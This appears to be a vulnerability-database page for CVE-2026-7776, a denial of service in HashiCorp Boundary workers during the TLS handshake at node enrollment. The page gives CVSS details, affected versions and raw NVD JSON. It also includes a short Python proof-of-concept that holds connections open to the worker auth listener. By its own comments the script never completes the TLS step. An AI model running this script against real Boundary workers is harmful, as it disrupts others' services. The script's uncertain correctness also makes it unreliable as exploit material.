Security Vulnerability Report
中文
CVE-2026-7776 CVSS 7.5 HIGH

CVE-2026-7776

Published: 2026-05-04 22:16:20
Last Modified: 2026-05-05 20:24:05
Source: [email protected]

Description

Boundary Community Edition and Boundary Enterprise (“Boundary”) workers are vulnerable to a denial-of-service condition during node enrollment TLS handshakes. An attacker with network access to the worker authentication listener may open a connection and delay or withhold the client certificate during the TLS handshake, causing worker connection handling to block. This may prevent legitimate worker connections from being accepted or routed. This vulnerability, CVE-2026-7776, is fixed in Boundary 0.21.3, 0.20.3, 0.19.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

HashiCorp Boundary < 0.19.5
HashiCorp Boundary 0.20.0 - 0.20.2
HashiCorp Boundary 0.21.0 - 0.21.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import ssl import time # Target configuration TARGET_HOST = 'boundary-worker.example.com' TARGET_PORT = 9202 # Default worker auth listener port def exploit_dos(): try: # Establish a TCP connection sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((TARGET_HOST, TARGET_PORT)) # Wrap socket with SSL context but do not complete handshake fully or send cert # In a real exploit, we might start the handshake and pause context = ssl.create_default_context() # Attempt to wrap, which initiates handshake # Depending on implementation, simply holding the socket open might trigger the bug # if the server expects a cert and blocks waiting for it. # Simulate holding the connection open without sending client cert print(f"[+] Connection established to {TARGET_HOST}:{TARGET_PORT}") print("[*] Holding connection open to block worker thread...") # Keep the connection open indefinitely to consume the worker slot while True: time.sleep(1) except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == '__main__': exploit_dos()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7776", "sourceIdentifier": "[email protected]", "published": "2026-05-04T22:16:20.330", "lastModified": "2026-05-05T20:24:04.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Boundary Community Edition and Boundary Enterprise (“Boundary”) workers are vulnerable to a denial-of-service condition during node enrollment TLS handshakes. An attacker with network access to the worker authentication listener may open a connection and delay or withhold the client certificate during the TLS handshake, causing worker connection handling to block. This may prevent legitimate worker connections from being accepted or routed. This vulnerability, CVE-2026-7776, is fixed in Boundary 0.21.3, 0.20.3, 0.19.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://discuss.hashicorp.com/t/hcsec-2026-11-boundary-workers-vulnerable-to-denial-of-service-during-tls-handshake", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.